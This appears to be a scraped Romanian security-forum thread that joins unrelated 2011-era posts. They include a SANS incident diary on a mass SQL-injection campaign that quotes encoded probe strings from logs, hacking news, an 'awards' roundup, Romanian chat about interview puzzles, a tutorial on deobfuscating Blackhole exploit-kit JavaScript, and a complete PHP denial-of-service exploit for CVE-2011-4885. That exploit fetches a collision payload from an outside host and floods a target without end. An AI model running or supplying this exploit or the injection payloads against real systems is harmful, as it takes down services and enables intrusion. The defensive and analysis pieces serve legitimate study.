about 200, by lunch 1000 and a few minutes ago 4000+. Targets include ASP sites and Coldfusion (Thanks Will) The attack seems to work on all versions of MSSQL. The hex will show in the IIS log files, so monitor those. Make sure that applications only have the access they require, so if the page does not need to update a DB, then use an account that can only read. Sources of the attack vary, it is automated and spreading fairly rapidly. As one of the comments mentioned it looks like lizamoon which infected over 1,000,000 sites earlier this year. The trail of the files ends up on "adobeflash page" or fake AV. Blocking access to the lilupophilupop site will prevent infection of clients should they hit an infected site and be redirected. UPDATE 8/12/2011 Firstly thanks to those that have provided comments and additional information. As of a few minutes ago the approximate number of sites infected is about 160,000 sites. Looking at where the infections are shows .com, .de, & .uk as the most affected regions. .com - 19,100 .au - 167 .uk - 25,200 .fr - 10,900 .in - 1,780 .ie - 2,350 .ca -1,630 .be - 4,580 .nl - 14,000 .de - 23,200 .no - 2,410 Based on information in the log files of some incidents the preparation for the attack goes back a little while. Log records show that at least two weeks prior to the actual injection attack the system is being probed for vulnerable pages as well as attempts to identify the product being used. For example: 2011-11-16 05:13:55 176.65.161.71 xxxxxxxx.asp PAGEID=189%27%29%29%2F%2A%2A%2For%2F%2A%2A%2F1%3D%40%40version------snip----|Line_1:_Incorrect_syntax_near_')' 2011-11-17 10:50:01 64.191.13.178 /xxxxxxxxxxx.asp PAGEID=189%29%2F%2A%2A%2For%2F%2A%2A%2F1%3D%40%40version--------snip----Syntax_error_converting_the_varchar_value_'189)/**/or/**/1=@@version--'_to_a_column_of_data_type_int. 2011-11-17 14:48:09 213.229.96.13 /xxxxxxxxxxx.asp PAGEID=189%2F%2A%2A%2For%2F%2A%2A%2F1%3D%40%40version%29%29------snip----|Syntax_error_converting_the_varchar_value_'189/**/or/**/1=@@version))--'_to_a_column_of_data_type_int. 2011-11-19 22:24:41 94.228.222.41 /xxxxxxxxxxx.asp PAGEID=189%27%2F%2A%2A%2For%2F%2A%2%2F1%3D%40%40version%29------snip----|Line_1:_Incorrect_syntax_near_')'. From the above you can see that over time there are a few attempts, then the next day the next attempt appears in the log files. The attempts are from different IP addresses, but there certainly is some progression based on responses received. In this instance the PAGEID=189 parameter on page xxxxxxxx.asp is vulnerable. If you search your log files for 500 errors, go back a few weeks, you will find the probing queries. If you are still battling this, please make sure that you identify the entry page. If you restore your DB and bring the system back online without identifying the entry point, then it will only be a matter of time before the system is re-compromised. I put some things you might look for in the comments section of the diary. The easiest place to start will be to look for the 500 error messages, mainly because the final injection is likely to cause your DB product to throw an error which will show as a 500 error. Even if it does not, you may be able to identify the probing queries and from those identify the final injection. When looking at fixing the problem do not forget that this vulnerability is a coding issue. You may need to make application changes. To address the issue make sure you perform proper input validation for every parameter you accept. http://isc.sans.edu/diary.html?storyid=12127

Hackers launching own satellites in orbit to beat Censorship Worried about Internet censorship by SOPA and PIPA ? Wait !! This News is for you , Hackers plan to take the internet beyond the reach of censors by putting their own communication satellites into orbit. Good guy hackers plan to launch satellites to fight the Stop Online Piracy Act and create a censorship-free Internet. According to BBC News Technology Reporter David Meyer, the plan, which was detailed this week during the Chaos Communication Congress (CCC) in Berlin, is in response to proposed legislation such as the Stop Online Piracy Act (SOPA), which would allow the U.S. government to block websites believed to violate intellectual property law. “The first goal is an uncensorable internet in space,” hacking activity Nick Farr, who initially began soliciting financial support for what has been dubbed the Hackerspace Global Grid, in August, told Meyer on Friday. “Let’s take the internet out of the control of terrestrial entities… [The hacker] community can put humanity back in space in a meaningful way.” Can a space-based Internet be done? Sure, it’s already been done. Will hackers be able do it? Questionable. Will it stop censorship? Hardly. Commercial satellite Internet has been available for a number of years, but it is slow, capacity limited, and the trip to and from space adds a noticeable delay that can disrupt some applications. There are sound reasons why long-distance telephone, television and Internet long ago moved from satellites to terrestrial microwave and then fiber optic. Meyer reports that while some hobbyists have managed to successfully place small satellites into orbit for short periods of time, but that tracking them have proved difficult due to budget constraints.Those involved with the Hackerspace Global Grid believe that if they are able to raise enough capital in order to overcome those difficulties, and ultimately, they hope to be able to send an amateur astronaut to the moon perhaps within the next quarter century. In the open-source spirit of Hackerspace, Mr Bauer and some friends came up with the idea of a distributed network of low-cost ground stations that can be bought or built by individuals.Used together in a global network, these stations would be able to pinpoint satellites at any given time, while also making it easier and more reliable for fast-moving satellites to send data back to earth. The report suggests that the individuals working on the satellite network are doing so in an “open-source spirit” with 26-year-old Armin Bauer of Stuttgart and colleagues working on the communications infrastructure of the ambitious project.With the assistance of German aerospace research initiative Constellation, they are working on what Bauer describes as a sort of “reverse GPS” which would let them know the precise locations of the satellites in much the same way that GPS probes help customers pinpoint their location on Earth. Bauer told Meyer that the team intents to have three prototype ground stations operational during the first half of next year, and is looking to sell them for approximately 100 Euros per unit. Experts say the satellite project is feasible, but could be restricted by technical limitations."Low earth orbit satellites such as have been launched by amateurs so far, do not stay in a single place but rather orbit, typically every 90 minutes," said Prof Alan Woodward from the computing department at the University of Surrey. "This [hacker] community can put humanity back in space in a meaningful way," Farr said."The goal is to get back to where we were in the 1970s. Hackers find it offensive that we've had the technology since before many of us were born and we haven't gone back." and apparently those who typically don't follow the law " hackers " think there's something they can do about it.

elevii, casnicele si somerii pot sta pe FB pana le crapa ochii. Tu ca om dedicat muncii nu ai de unde sa stii ce se intampla la ora aia pe facebook pentru ca se presupune ca ar trebuii sa ai alte preocupari. Zic si eu... cam asa vad problema.

am o banuiala ca asta e un fel de intrebare capcana. La ora 2:30 PM intr-o zi de vineri, ar trebui sa fi preocupat cu problemele job-ului, nu s-o arzi pe facebook. am i right ?

Trebuie sa privesti intrebarea din perspectiva angajatorului si sa-i oferi un raspuns care sa-l motiveze sa te accepte. Problemele sunt mai mult de natura psihologica decat "matematice". Practic cel care te intervieveaza doreste sa determine cat de perspicace poti fi in diverse situatii inedite si cate de eficient poti lua o decizie. Sa luam exemplul cu becurile (Qualcomm, post de inginer) - din momentul in care obtii postul cred ca esti constient ca nu te va intreba nici dracu' despre becuri. Dar scopul intrebarii este de a stabilii cat de multe resurse ai putea epuiza intr-o situatie mai dificila. Tu propui ca solutie o metoda de tipul divide-et-impera, ceea ce e bine. Dar de ce ai plecat direct de la etajul 100? Deja esti sigur ca becul se va sparge de la etajul 100 tinand cont de ipoteza probelemei (sunt 100 de etaje maxim iar becurile sunt destructibile). Nu ar fi mai optim sa incepi de la etajul , 37 sa zicem cum ai calculat tu ? Pentru ca deja mai adaugi si posibilitatea probabilistica de a gasi distanta pe care trebuie sa o aflii spargand astfel mult mai putine becuri..

Hacking Awards : Best of Year 2011 2011 has been labeled the “Year of the Hack” or “Epic #Fail 2011”. Hacking has become much easier over the years, which is why 2011 had a lot of hacking for good and for bad. Hackers are coming up with tools as well as finding new methods for hacking faster then companies can increase their security. Every year there are always forward advancements in the tools and programs that can be used by the hackers. At the end of year 2011 we decided to give “The Hacker News Awards 2011“. The Hacker News Awards will be an annual awards ceremony celebrating the achievements and failures of security researchers and the Hacking community. The THN Award is judged by a panel of respected security researchers and Editors at The Hacker News. Year 2011 came to an end following Operation Payback and Antisec, which targeted companies refusing to accept payments to WikiLeak’s, such as, Visa and Amazon. Those attacks were carried out by Anonymous & Lulzsec. This year corporations, international agencies, and governments are now experiencing a flood of what is called Advanced Persistent Threats. APTs refer to a group of well-funded, highly capable hackers pursuing a specific agenda, often organized by a nation or State. Sony somehow pissed off the hacking group LulzSec, which downloaded information for millions of users, while posting to Sony’s system: “LulzSec was here you sexy bastards! Stupid Sony, so very stupid.“ The Hacker News Awards Categories & Winners 1.) Person of the Year : Julian Paul Assange He is, of course, the lean, tall, and pale 39-year-old Australian master hacker at the white-hot center of the whistle-blowing website WikiLeaks and, after revealing thousands of secret Afghan battlefield reports this week, the subject of investigation by U.S. authorities. 2011 could also be called the “Age of WikiLeaks”. Assange described himself in a private conversation as “the heart and soul of this organisation, its founder, philosopher, spokesperson, original coder, organizer, financier, and all the rest”. Wikileaks celebrate its 5th Birthday on 4th October 2011, for being only 5 years old they have done a remarkable and outstanding job of serving the people. The one thing most governments in the world have left off their agenda’s. Keep up the good work Wikileaks and we stand in support and behind you. 2.) Best Hacking Group of the Year 2011 : ANONYMOUS DECK THE HALLS AND BATTON DOWN THE SECURITY SYSTEMS…..THEY AIN’T GOIN AWAY! Anonymous hackers have gained world wide attention because of their hacktivism. Anonymous is not an organization. Anonymous has no leaders, no gurus, no ideologists. Anonymous has performed many operations like Attack on HBGary Federal, 2011 Bank of America document release, Operation Sony, Operation Anti-Security and lots more. Complete Coverage on all Anonymous related news is here. 3.) Best Whitehat hacker of the Year 2011 : CHARLIE MILLER CHARLIE SHOWS TUNA ISN’T THE ONLY THING TO PROFIT FROM! Charlie Miller is a former hacker who has become an information security consultant now working with the Department of Defense (DOD) and helping out with cyber security. He spent five years working for the National Security Agency. Miller demonstrated his hacks publicly on products manufactured by Apple. In 2008 he won a $10,000 cash prize at the hacker conference Pwn2Own in Vancouver Canada for being the first to find a critical bug in the ultrathin MacBook Air. The next year, he won $5,000 for cracking Safari. In 2009 he also demonstrated an SMS processing vulnerability that allowed for complete compromise of the Apple iPhone and denial-of-service attacks on other phones. In 2011 he found a security hole in an iPhone’s or iPad’s security. Charlie Miller gets a kick of out defeating Apple’s security mechanisms, using his hacking skills to break into Macbooks and iPhones. 4.) Best Leak of the year 2011 : HBGARY FEDERAL EMAILS LEAKED BY ANONYMOUS GEE GREG, YOU THOUGHT WE JUST PLAYED WITH MATEL COMPUTERS! NOT!!!!! HBGary Federal who was helping the federal government track down cyber activists was itself hacked by the very same activists! Gotta love these guys. Through an elegant but by the numbers social engineering effort those fun fellas at Anonymous, hacked and publicly shamed poor little HBGary Federal. Massive reputation damage and tons of turn-over in executive leadership resulted. Anonymous released 27,000 emails from the server of Greg Hoglund, chief executive of the software security firm HBGary. They posted 50,000 emails of Aaron Barr from the CEO of its sister organization, HBGary Federal. They obtained the emails by hacking into Hoglund’s email. 5.) Best Defacement of the Year 2011 : DNS HIJACKING OF HIGH PROFILE SITES BY TURKGUVENLIGI TURKGUVENLIGI……..THE GIFT THAT KEEPS ON GIVING!! Turkguvenligi also known by the name “TG Hacker’ hacked some very high profile sites using DNS Hijacking. Sites included, Theregister.co.uk , Vodafone, Telegraph, Acer, National Geographic. He diverted visitors to a page declaring it was “World Hackers Day”. TurkGuvenligi has claimed credit for dozens of similar defacement attacks since late 2008. 6.) Craziest Hack of the year: INMOTION HOSTING (Over 700,000 Websites Hacked) BEWARE OF TIGER’S IN MOTION…….COMING TO YOUR WEBSITE SOON! InMotion’s data center got hit by the hacker that calls himself TiGER-M@TE, leaving a few hundred thousand website owners with nonfunctional pages and 700,000 web Pages defaced . He is also the one responsible for the attack carried out on Google Bangladesh. In our humble opinion, this is the craziest hack of the year. 7.) Malware of Year 2011 : DuQu ALAH CAN’T HELP IRAN…….NOT WITH DuQu ON THE LOOSE! This year was really hot on malware discovery and analysis. DuQu became the first known network modular rootkit. DuQu has flexibility for hackers to help remove and add new features quickly and without special effort. Some experts have doubts on relation between the Stuxnet and DuQu creators as they both aim for stealing and collecting data related to Iranian agencies activities. 8.) Best Hacking Tool of the Year 2011 – ANTI (Android Network Toolkit) HEY CYBER WORLD, STICK THIS IN YOUR TOOL BELT! ANTI is the smallest but most powerful hacking tool developed by the company Zimperium. Anti-Android Network Toolkit is an app that uses WiFi scanning tools to scan networks. You can scan a network that you have the phone connected to or you can scan any other nearby open networks. Security admins can use Anti to test network host vulnerabilities for DoS attacks and other threats. Features : OS detection, traceroute, port connect, Wi-Fi monitor, HTTP server, man-in-the-middle threats, remote exploits, Password Cracker and DoS attack and plugins. 9.) High Profile Hacker of the Year 2011 : LULZSEC LULZSEC KEEPS US LAUGHING ALL THROUGH 2011! Lulz Security, commonly abbreviated as LulzSec, is a computer hacker group that claims responsibility for several high profile attacks, including the compromise of user accounts from Sony Pictures in 2011. The group also claimed responsibility for taking the CIA website offline. It has gained attention due to its high profile targets and the sarcastic messages it has posted in the aftermath of its attacks. The group’s first recorded attack was against Fox.com’s website. LulzSec does not appear to hack for financial profit. The group’s claimed main motivation is to have fun by causing mayhem. They do things “for the lulz” and focus on the possible comedic and entertainment value of attacking targets. 10.) Biggest Victim of the Year 2011 : SONY SONY SHINES AS THE BIGGEST VICTIM OF ALL! Sony gets the Most Epic fail award so we want to give the Best Victim of the year award to Sony. Almost all Sony’s websites including Indonesia, Japan, Thailand, Greece, Canada, Netherlands, Europe, Russia, Portugal & Sony PlayStation Network were Hacked. Defacement of various domains of Sony and Personal information of 77 million people, including customer names, addresses, e-mail addresses, birthdays, PlayStation Network and Qriocity passwords, user names, online handles and possibly credit cards were exposed. Sony expects the hack of the PlayStation Network and cost at ¥14 billion (US$170 million) . 11.) Most Spamy Social Network : FACEBOOK FACEBOOK OUTTA FACE IT……..IT’S A RIPE TARGET FOR 2012 Social network sites such as Facebook, Google+ or Twitter are gaining popularity. But the ‘Web 2.0? presents new dangers. The wave of pornographic and violent images, Spam messages, Virus and various Worms that flooded Facebook over the past year, make it the Most Spamy Social Network of the Year. Social media is the new frontier for all of this spam. The attack tricked users into clicking on a story they thought would bring them a related video or picture. Instead, Facebook members were taken to websites that attacked their browsers with malicious software and posted violent and disturbing images to their news feeds. 12.) Most Vulnerable Mobile OS of Year 2011 : ANDROIDS MALWARE GETS A FREE RIDE ON MOBILE DEVICES! Mobile devices are seeing a record number of Malware attacks, with Androids leading the way as the mobile operating systems are the most likely to be targeted. Android’s vulnerability to malicious content including third-party apps, SMS Trojan viruses and unexpected bugs distributed through free Wi-Fi connections has risen by 45% in 2011. This year we have seen record-breaking numbers of Malware, especially on mobile devices, where the uptake is in direct correlation to popularity. 13.) Best Hacking Book of the Year: BACKTRACK 5 WIRELESS PENETRATION TESTING ATTENTION CLASS, VIVEK RAMACHANDRAN HAS ENTERED THE ROOM! Vivek Ramachandran is a world renowned security researcher and evangelist, who is well known for his discovery of the Wireless Caffe Latte attack, and author of the most amazing book “BackTrack 5 Wireless Penetration Testing. This book is written completely from a practical perspective. The book wastes no time in delving into a hands-on session with wireless networking. All the way through there are lots of screengrabs, so you can see what should be happening on your screen. 14.) Most Innovative Hack : DIGITAL CERTIFICATES SPOOFING BY COMODO HACKER COMODOHACKER BRINGS OUT THE DRAGON IN CYBER SECURITY CONCERNS The name “Comodohacker” gets the most Innovative Hacker award from THN for the breach of the Internet’s trust system arising from an outmoded method for assuring that a Web site is authentic. A breach that let a hacker spoof digital certificates for Google.com, Yahoo.com, and other Web sites is prompting browser makers to rethink security. A 21-year-old Iranian patriot took credit saying he was protesting US policy and retaliating against the US for its alleged involvement with last year’s Stuxnet, which experts say was designed to target Iran’s nuclear program. 15.) Biggest hack of the Year 2011 : SONY PLAYSTATION SONY, SONY, WE PLAY YOUR LEAKS ON OUR OWN STATIONS! The PlayStation Network is an online multiplayer gaming and digital media delivery service owned and run by Sony Computer Entertainment .On April 26, 2011 Sony Playstation announced its network and Qriocity had both been compromised by hackers between April 17 and April 19 allowing access to 70 million user accounts. Get full coverage on this News. “TRUTH IS THE MOST POWERFUL WEAPON AGAINST INJUSTICE” http://www.exploit-id.com/news/the-hacker-news-hacking-awards-best-of-year-2011?utm_medium=twitter&utm_source=twitterfeed

Posted by Ax0n I am by no means an expert on this stuff. A few weeks ago, I ran across some suspicious links in spam and decided to see where they led. Some of them claimed to be from financial institutions that I have absolutely no connection to, and claimed that some transaction had failed to occur. Others were variants of shipping confirmation scams, pharmacy junk, etc. I wish I could say that I have no idea how people fall for these, but the fact is that some people will literally click on anything that shows up in their inbox, open any attachment and follow any link, no matter how blatantly fake we professionals think these scams are. What lay at the tail end of all the script="http://some-site/whatever.js" includes and document.location redirects? A webpage that'd been owned, filled with a huge pile of nonsensical jibberish that could barely pass as javascript, which happened to be part of the Blackhole Exploit Kit. I've done my share of picking apart obfuscated javascript before, but it had been a while. I gave a presentation of this same thing at KC2600 a few weeks ago. Then, this week, a colleague of mine who missed the meeting ran into the same thing in the wild. I passed on what I'd learned, and decided it might be time to write it up with a little more detail than I did a few weeks back. He made this quick video that covers how he was able to de-obfuscate this particular sample: By now, I've seen several different obfuscation schemes for BlackHole, but once it's decoded, it all looks about the same. The introductory basics are simple. Minimize the potential of infection by using a non-privileged account (and perhaps an OS other than Windows) and/or minimize the impact of a successful infection by running a virtual machine that you can blow away or revert to a snapshot of a known clean state. For the malware I'm using in this example, either (or both) of the above criteria will be ample to keep things from getting out of control. Other malware may be more insidious or may target non-Windows platforms. I have a few friends that have unwittingly infected their own workstations while trying to analyze things. Play safe. Once you have a safe lab environment, your goal is to examine a suspicious link and dissect it. In my case, I was able to find a few links to malware in my personal mail's spam folder. For the demo at KC2600, I used Malware Domain List to find some Blackhole samples. In the wild, there may be any number of redirects ahead of the malware. You may see a shortened URL (through goo.gl, tinyurl, etc) which goes to a sparse HTML page with several calls to javascripts hosted on various sites, and those javascripts may simply be a document.location pointing to the malware. I usually stick with curl or wget to pull down suspicious links, and then I keep looking at the content and following the redirects until I strike gold. The javascript itself is ugly once you get to it. Sometimes, the byte array is only a few (really long) lines. Other times, like this sample, each byte of the obfuscated data is on a new line, like this: You'll see a few interesting things. There's an "e=eval;" line near the bottom, and then "e©;" after that. It doesn't take a coding genius to realize that this is a way to call eval© without triggering some IDS signatures that look for "eval(". Many samples I saw weren't quite this obvious. In fact, the script in the video has the eval alias in a different part of the script and varies in several other ways if you look closely. To turn this cryptic payload into something that resembles actual javascript, there's a post on SANS ISC from several years ago covering a few methods. I went with the so-called Tom Liston Method, essentially trying to wrangle the decoded stuff that was destined for the eval function into a document.write within a textarea box instead. Note: I ran into one sample of BlackHole that has a /textarea tag near the beginning, which would keep someone from using this trick to easily view the code with this trick, but I don't think it will eval the stuff behind it since it's been changed to a document.write. In the above example (and in the video), the content that is destined for eval is stored in variable "c", so you simply replace "e©;" with: document.write("<textarea cols="150" rows="100">" + c + "</textarea>"); But obviously, you need to use some brain power here to figure out what trickery they're using to call eval, and what the variable is that needs to be wrapped up in the above document.write command. You may also wish to mess with the rows and columns on the textarea. I know on my netbook, that textarea size is far too unweildy. On my desktop, it's almost perfect. Make sure the file is renamed as a .html, then load it up in your safe lab environment's browser, just in case something goes wrong. Voila. If you scroll through recent versions of BlackHole Exploit Kit, you'll see that it tries to load an embedded java applet and a PDF, both of which are designed to exploit recent vulnerabilities in JRE and Adobe Reader. Since I don't have Windows running in a VM environment (and I'm not keen on actually infecting any of my Windows boxes) I'm not entirely sure what gets loaded from there. I'm guessing the carberp trojan, given most of what I've read lately. If that's the case, a successful infection would likely block access to anti-malware sites, try to sabotage existing security software, and start gathering sensitive data such as card numbers and online banking credentials. http://www.h-i-r.net/2011/12/intro-to-javascript-malware-analysis.html

# Exploit Title: CVE-2011-4885 PHP Hashtables Denial of Service Exploit # Date: 1/1/12 # Author: infodox # Software Link: php.net # Version: 5.3.* # Tested on: Linux # CVE : CVE-2011-4885 Exploit Download -- http://infodox.co.cc/Downloads/phpdos.txt <?php /* PHP 5.3.* Hash Colission DoS Exploit by infodox Original version by itz me (opensc.ws) CVE-2011-4885 Mirrors List: http://www.exploit-db.com/sploits/hashcollide.txt http://compsoc.nuigalway.ie/~infodox/hashcollide.txt http://jrs-s.net/hashcollide.txt http://www.infodox.co.cc/Downloads/hashcollide.txt Changes: Different mirror for hashcollide.txt Now takes target as a command line argument Status message printing Twitter: @info_dox Blog: blog.infodox.co.cc Site: http://www.infodox.co.cc/ */ @set_time_limit(0); $targ = $argv[1]; $x = file_get_contents("http://jrs-s.net/hashcollide.txt"); // if this doesnt work replace with the mirrors_lst ones... while(1) { echo "firing"; $ch = curl_init("$targ"); curl_setopt($ch, CURLOPT_POSTFIELDS, $x); curl_exec($ch); curl_close($ch); echo "[+] Voly Sent!"; } ?> LE: am pus si set_time_limit

dafuq ? )))))